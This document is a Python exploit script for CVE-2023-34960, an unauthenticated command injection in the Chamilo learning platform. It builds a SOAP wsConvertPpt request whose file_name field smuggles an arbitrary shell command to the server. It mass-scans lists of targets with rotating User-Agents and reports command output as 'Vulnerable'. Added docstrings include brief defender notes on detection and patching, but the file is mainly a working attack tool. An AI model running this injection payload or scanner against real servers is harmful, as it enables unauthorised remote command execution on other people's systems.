exploit.py
# Author: Pari Malam
import argparse
import random
import warnings
import requests
import os
import xml.etree.ElementTree as ET
from sys import stdout
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
# Blanket filter: every Python warning is silenced for the whole process. That
# includes the InsecureRequestWarning urllib3 emits when a request is made with
# verify=False, so disabled TLS verification produces no visible notice.
warnings.filterwarnings("ignore")

# Short aliases for the colorama foreground colours used in console messages.
FY, FG, FR, FC, FW = (
    Fore.YELLOW,
    Fore.GREEN,
    Fore.RED,
    Fore.CYAN,
    Fore.WHITE,
)
def clear():
    """Clear the terminal by running the platform's clear-screen command.

    Uses ``clear`` when ``os.name`` is ``'posix'`` and ``cls`` otherwise. The
    command string is a fixed literal, so no external input reaches the shell.
    """
    if os.name == 'posix':
        screen_cmd = 'clear'
    else:
        screen_cmd = 'cls'
    os.system(screen_cmd)
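def mkdir():
    """Create the ``Results`` directory in the current working directory.

    Does nothing when a filesystem entry named ``Results`` already exists.
    The creation is attempted directly instead of testing for existence first,
    which removes the window between the check and the ``os.mkdir`` call in
    which a concurrent run could create the directory and make this one fail.
    """
    try:
        os.mkdir('Results')
    except FileExistsError:
        # Already present (same outcome as the previous exists() guard).
        pass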
def banners():
    """Clear the screen and print the coloured start-up banner.

    Output order: a blank spacer line, the red ASCII-art logo, the yellow
    author/GitHub info box, then the CVE title line. Everything goes to
    standard output; nothing is returned.
    """
    clear()
    stdout.write(" \n")

    # ASCII-art logo, one stdout write per row, each prefixed with light red.
    logo_rows = (
        "██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗ \n",
        "██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗\n",
        "██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║\n",
        "██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n",
        "██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n",
        "██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝\n",
        "╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝ \n",
    )
    for row in logo_rows:
        stdout.write(Fore.LIGHTRED_EX + row)

    # Info box: yellow frame with the author and GitHub lines inside it.
    bullet = "║ \x1b[38;2;255;20;147m• "
    box_rows = (
        Fore.YELLOW + "═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════\n",
        Fore.YELLOW + "╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n",
        Fore.YELLOW + bullet + Fore.GREEN + "AUTHOR " + Fore.RED + " |" + Fore.LIGHTWHITE_EX + " PARI MALAM " + Fore.YELLOW + "║\n",
        Fore.YELLOW + "╔════════════════════════════════════════════════════════════════════════════╝\n",
        Fore.YELLOW + bullet + Fore.GREEN + "GITHUB " + Fore.RED + " |" + Fore.LIGHTWHITE_EX + " GITHUB.COM/PARI-MALAM " + Fore.YELLOW + "║\n",
        Fore.YELLOW + "╚════════════════════════════════════════════════════════════════════════════╝\n",
    )
    for row in box_rows:
        stdout.write(row)

    print(f"{FY}[CVE-2023-34960] - {FG}Unauthenticated Command Injection\n{Style.RESET_ALL}")
# Module-level call: the terminal is cleared and the banner printed as soon as
# this file is executed or imported, before main() parses any arguments.
banners()
def users_agents():
    """Load the pool of User-Agent strings from ``lib/ua.txt``.

    The path is relative to the current working directory. Each line is
    stripped of surrounding whitespace and blank lines are dropped.

    Returns:
        A list of non-empty User-Agent strings in file order.

    Raises:
        OSError: If ``lib/ua.txt`` cannot be opened.
    """
    with open("lib/ua.txt", "r") as ua_file:
        raw_lines = ua_file.readlines()

    pool = []
    for raw in raw_lines:
        cleaned = raw.strip()
        if cleaned:
            pool.append(cleaned)
    return pool
def chamilo(url, command, user_agents):
    """Send one CVE-2023-34960 SOAP request to ``url`` and report the reply.

    The request is a POST to ``/main/webservices/additional_webservices.php``
    carrying a ``wsConvertPpt`` call whose ``file_name`` value embeds
    ``command`` between shell metacharacters. Only ``Content-Type`` and
    ``User-Agent`` headers are set; no cookie or credential is attached.

    Args:
        url: Target host (and optional path). "http://" is always prepended
            and "/" characters are stripped from both ends.
        command: Text interpolated verbatim into the ``file_name`` value.
        user_agents: Sequence of User-Agent strings; one is picked at random.

    Returns:
        The text of the first ``<return>`` element of a parseable HTTP 200
        response, which the script treats as evidence of vulnerability;
        ``None`` in every other case.

    Defender notes:
        The User-Agent changes per request, so detections are better keyed on
        the request path and the SOAP body (a ``wsConvertPpt`` call whose
        ``file_name`` contains quote, pipe, backtick or ``#`` characters) than
        on the client string. Mitigation is the vendor fix for CVE-2023-34960
        or restricting access to this web-service endpoint.
    """
    # The scheme is forced to plain HTTP; an input that already carries a
    # scheme is not handled here.
    url = "http://" + url.strip("/")
    # SOAP envelope sent as the request body. `{{}}` renders as a literal `{}`;
    # `{url}` and `{command}` are interpolated without any escaping.
    body = f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |{command}||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">720x540</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''
    # random.choice raises IndexError on an empty pool; this line is outside
    # the try block below, so that error propagates to the caller.
    headers = {'Content-Type': 'text/xml', 'User-Agent': random.choice(user_agents)}
    try:
        # verify=False turns off TLS certificate checks (presumably only
        # relevant if the server redirects to HTTPS, since the URL is always
        # http:// - TODO confirm). timeout=5 bounds the connect and read waits.
        r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
    except Exception as e:
        # Every request failure is reported as "Invalid"; the exception
        # object itself is never inspected or logged.
        print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid {Style.RESET_ALL}")
        return None
    # Any status other than 200 falls through to the final `return None`
    # without printing anything from this function.
    if r.status_code == 200:
        try:
            # NOTE(review): r.text is supplied by an untrusted remote server.
            # Python's documentation warns that the stdlib XML parsers are not
            # hardened against maliciously constructed data; a hardened parser
            # would be the safer choice for this input.
            pwned = ET.fromstring(r.text)
        except ET.ParseError:
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid XML Response{Style.RESET_ALL}")
            return None
        # First <return> element anywhere in the response tree.
        tagged = pwned.find('.//return')
        if tagged is not None:
            # Server-controlled text is echoed to the terminal unfiltered.
            content = tagged.text
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FG}[w00t!] - {FC}Vulnerable: {FW}{content}{Style.RESET_ALL}")
            return content
        else:
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not found on execution. Check manually.{Style.RESET_ALL}")
            return None
    return None
def main():
    """Parse the command line, run ``chamilo`` per URL and report the results.

    URLs come from ``--filename`` (one per line, whitespace-stripped) or from
    ``--url``; with neither, argparse prints an error and exits. Requests are
    dispatched on a thread pool of ``--threads`` workers and collected in
    submission order. When ``--output`` is given, each positive result is
    appended to that file.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument("-u", "--url", help="URL address (without 'http://' prefix)")
    cli.add_argument("-f", "--filename", help="File containing URLs")
    cli.add_argument("-c", "--command", help="Command to execute (optional)")
    cli.add_argument("-t", "--threads", type=int, default=10, help="Maximum number of concurrent threads")
    cli.add_argument("-o", "--output", help="Output file for saving the results")
    args = cli.parse_args()

    # The earlier `... or 'uname -a' or 'whoami'` chain could never reach its
    # last operand, so the effective default is just 'uname -a'.
    command = args.command or 'uname -a'

    if args.filename:
        # Both branches of the earlier scheme test applied the same strip(),
        # so entries are simply whitespace-stripped. Blank lines are kept.
        with open(args.filename, "r") as url_file:
            urls = [line.strip() for line in url_file]
    elif args.url:
        urls = [args.url]
    else:
        cli.error(f"{FR}Whut are you doin bro?")

    user_agents = users_agents()
    results = []
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = [executor.submit(chamilo, url, command, user_agents) for url in urls]
        # zip keeps each future paired with the URL it was submitted for.
        for future, url in zip(futures, urls):
            outcome = future.result()
            if not outcome:
                print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not Vulnerable{Style.RESET_ALL}")
                continue
            results.append((url, outcome))

    if args.output:
        # Append mode: repeated runs accumulate in the same file. "Results/" is
        # a literal prefix on the response text, not a filesystem path.
        with open(args.output, "a") as report:
            for url, result in results:
                report.write(f"URL: {url}\nResult: Results/{result}\n\n")
# Run the CLI only when the file is executed as a script. The module-level
# banners() call earlier in the file is not behind this guard and still runs
# on import.
if __name__ == '__main__':
    main()